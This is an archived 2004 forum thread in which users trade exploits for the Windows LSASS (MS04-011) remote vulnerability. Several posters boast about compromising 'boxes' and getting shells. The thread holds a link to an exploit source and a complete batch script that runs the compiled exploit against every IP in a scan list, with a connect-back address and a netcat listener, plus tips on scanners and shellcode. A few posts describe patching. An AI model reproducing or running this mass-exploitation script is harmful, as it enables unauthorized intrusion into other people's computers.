2unlimited
May 2 2004, 05:47 AM
Hello to all
I found many kind of Lsass Exploits here !!!!
But they didn't work....
So which one of them working true and the best ?
Thanks in advance
iWeasel410
May 2 2004, 05:51 AM
houseofdabus' version works perfectly fine, got a few boxes today
just use it with netcat and you're good to go
Demsta
May 2 2004, 06:19 AM
they all work.. but i use houseofdabus's version aswell.. i only use this exploit for network hacking though.. the exploit needs netbois and most uni's (if not all) dont let netbios run in or out.. but it does run internally
.. and i only do this to let them know they need a patch..
blahplok
May 2 2004, 06:37 AM
i think rLsasrv.exe is good, i'v got a lot of shell with this exploit...
extreme83
May 2 2004, 07:21 AM
all work for me.. you can edit the code of houseofdabus to be even better..
I made an autohaxor out of it..
it works perfectly well, load list, press "GO".. over a hundred boxes till now !!
popo0421
May 2 2004, 07:36 AM
yes, I think the houseofdabus' version exploit is perfect one.
success rate is 80%.
realloader
May 2 2004, 07:42 AM
I know there r alot of this exploit.i have many shell too!
But where can i get :houseofdabus' version ?
Demsta
May 2 2004, 08:13 AM
| CODE |
| http://www.k-otik.com/exploits/04292004.HOD-ms04011-lsasrv-expl.c.php |
Unio
May 2 2004, 08:27 AM
| QUOTE |
| I made an autohaxor out of it.. |
can you tell me how ?
I try make autohaxor but it didn't work
thyr0x1ne
May 2 2004, 08:45 AM
Nothing really amazing as its not hardly c++ or anyting else code , but create a auto.bat file ( for example ) and put this in :
| CODE |
@echo off
CLS
color 70
echo **************************************************************
echo *
echo * Windows Lsasrv.dll Remote Universal Exploit XP/2K (MS04-011)
echo *
echo **************************************************************
pause
CLS
set /p scan="[-] IPs scan filename :"
echo Targets:
echo -- 0 [0x01004600]: WinXP Professional [universal] lsass.exe
echo -- 1 [0x7515123c]: Win2k Professional [universal] netrap.dll
echo -- 2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll
set /p target="[-] Target :"
set /p ip="[-] Connect back IP :"
set /p bind="[-] BindPort :"
for /f "eol=; tokens=1*" %%i in (%scan%) do lsauniv.exe %target% %%i %bind% %ip%
CLS
echo [-] End of process , press a key ...
pause
|
then put this auto.bat in the directory u have : scan.txt ( scan results ) and lsauniv.exe ( according to be the housedabus exploit compiled )
launch auto.bat after u launched netcat listening on bindport you choosed
TheRealGiant
May 2 2004, 08:48 AM
Little question:
Is there a vulnerability scanner for this vulnerability, or shall I scan port 445?
Thanks.
Ecko
May 2 2004, 09:03 AM
yes their is ascanner named DSScan...
episode
May 2 2004, 09:11 AM
oh cool
rscience
May 2 2004, 09:38 AM
DDscan is REALY BIG shittt !!!!!!!!!
on GovernmentSecurity.org there is allready posted autohaxor for both systems
XP and 2000.
pr3d4ter
May 2 2004, 09:49 AM
can anyone tell me how to secure a server hacked with this bug ?
is it possible to install the mspatch in a cmd ?
eddy
May 2 2004, 10:58 AM
| QUOTE (pr3d4ter @ May 2 2004, 09:49 AM) |
can anyone tell me how to secure a server hacked with this bug ?
is it possible to install the mspatch in a cmd ? |
yes it is download it from ms site and do like name.exe /quiet /forcerestart
or what ever options you want nice lost of them on ms site good luck
strohunter
May 2 2004, 12:52 PM
http://support.microsoft.com/?kbid=835732according to microsoft, with some hardware it can crash the OS...
has anyone got this expl0it to work sucessfuly with win2k?
dX
Borgon
May 2 2004, 05:44 PM
can someone provide me with the houseof dead win binary? I was able to port it over to linux but i would like the win32 version since i dont have vc++ to compile.
thank you
binary_hashes
May 2 2004, 06:47 PM
THE EXPLOIT IS GREAT BUT I WANT THE SAME EXPLOIT FOR PORT 139
THANKSX
EzMe
May 4 2004, 03:35 AM
| QUOTE (dxx @ May 2 2004, 04:44 PM) |
has anyone got this expl0it to work sucessfuly with win2k?
dX |
No I can't get it work on Win2k eather...?! Donno what I'm doin wrong.. :/
Anarchiste
May 4 2004, 09:29 AM
The unversal shellcode for xp work but not for win 2k...you must replace the shellcode with a win 2k generic shellcode....a friends made this, but he don't want leak..sorry
streetsurfer
May 4 2004, 02:49 PM
the first released lsass.c source will exploit win2k.
If it doesnt work it could be your outgoing port isnt working.
Check that first
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
